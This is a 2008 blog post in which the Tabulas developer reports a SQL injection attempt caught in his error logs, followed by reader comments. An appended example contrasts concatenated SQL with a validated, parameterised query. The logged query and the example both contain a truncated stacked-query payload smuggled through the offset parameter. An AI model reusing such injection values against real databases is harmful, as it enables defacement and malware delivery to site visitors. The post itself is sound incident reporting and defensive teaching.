So during the duration of my Tabulas code refactoring, I've turned on all PHP fatal errors to log to disk, and all MySQL errors to be emailed to me. I got the following interesting error:

SELECT entry_id, entry_userid, entry_url, entry_title, entry_status, entry_created, entry_draft, entry_updated, entry_category, entry_comment, entry_iconid, entry_favorite, entry_sticky, entry_watching, entry_reading, entry_listening, entry_mood, entry_feeling, entry_html, entry_nl2br, entry_break, entry_commentcount, entry_related, entry_status_effective FROM entries, entry_metadata WHERE entries.entry_id = entry_metadata.entryid AND entry_userid = '106634' AND entry_status_effective IN (0) AND entry_updated < NOW() AND entry_draft = 0 ORDER BY entry_sticky DESC, entry_updated DESC LIMIT 6 OFFSET 0;DECLARE @S CHAR(4000);SET @S=CAST(
0x

How interesting! Somebody was using the offset parameter for entries to do an injection attack! However, the GET param looked like junk, till I showed it to Max, who de-hexed it:

This nice little code snippet looped through my whole database, and would update any textual fields with a JS script.

Upon further inspection, the JS code embedded an <IFRAME> which loaded a Chinese page. This page, in turn, had the wonderful code snippet:

I'm running a Mac, but it looks like the JS tries to exploit ActiveX and do something real evil. Good thing I have a shred of competency when it comes to programming!

Posted by roy on September 14, 2008 at 08:44 PM in Web Development, Tabulas | 4 Comments
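An added example, not part of the original post and not Tabulas code: the logged query shows the offset value pasted unquoted after OFFSET, so the sketch below puts that concatenation next to a version that validates the value as an integer and passes it as a bound parameter. It uses Python with an in-memory SQLite table as a stand-in for the site's PHP/MySQL stack; the function names and sample rows are assumptions, and the payload is the truncated value from the log.

```python
import sqlite3

# Offset value exactly as it appears (truncated) in the logged query.
LOGGED_OFFSET = "0;DECLARE @S CHAR(4000);SET @S=CAST(0x"

BASE = ("SELECT entry_id, entry_title FROM entries "
        "WHERE entry_userid = ? AND entry_draft = 0 "
        "ORDER BY entry_sticky DESC, entry_updated DESC ")

def concatenated_query(raw_offset):
    """The 'before': the raw GET value is pasted after OFFSET."""
    return BASE + "LIMIT 6 OFFSET " + raw_offset

def parse_offset(raw, maximum=100_000):
    """Accept only ASCII decimal digits within a sane range."""
    if not (raw.isascii() and raw.isdigit()):
        raise ValueError("offset must be a non-negative integer")
    value = int(raw)
    if value > maximum:
        raise ValueError("offset out of range")
    return value

def fetch_entries(db, user_id, raw_offset):
    """The 'after': validated offset, passed as a bound parameter."""
    offset = parse_offset(raw_offset)
    return db.execute(BASE + "LIMIT 6 OFFSET ?", (user_id, offset)).fetchall()

def demo_db():
    """Constructed in-memory table standing in for the entries table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE entries (entry_id INTEGER, entry_userid INTEGER, "
               "entry_title TEXT, entry_draft INTEGER, entry_sticky INTEGER, "
               "entry_updated INTEGER)")
    db.executemany("INSERT INTO entries VALUES (?, 106634, ?, 0, 0, ?)",
                   [(i, f"post {i}", i) for i in range(1, 11)])
    return db

if __name__ == "__main__":
    db = demo_db()
    print(concatenated_query(LOGGED_OFFSET))   # same tail as the logged query
    print(fetch_entries(db, 106634, "6"))      # normal pagination still works
    try:
        fetch_entries(db, 106634, LOGGED_OFFSET)
    except ValueError as exc:
        print("rejected:", exc)
```

Quoting alone would not have helped here, since the value sits in a numeric position; the integer check is what closes it.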


Comment posted on September 16th, 2008 at 01:03 PM
That's pretty cool really.
Comment posted on September 16th, 2008 at 02:38 AM
I can see that you blurred the link, but we could still see it in the title bar of your Mac. ;)

sanjuro (guest)

Comment posted on September 15th, 2008 at 01:44 PM
Interesting, but... it was just injected using the GET method and he did manage to append his code to the query? Sounds serious.

That reminds me also I have an error showing up in my profile page: (don't pay attention to the rest of the blog, I need to erase everything and rebuild... someday)
Comment posted on September 15th, 2008 at 08:05 AM
Yeah, I tried hacking it to see if it was worthy of holding my thoughts in private.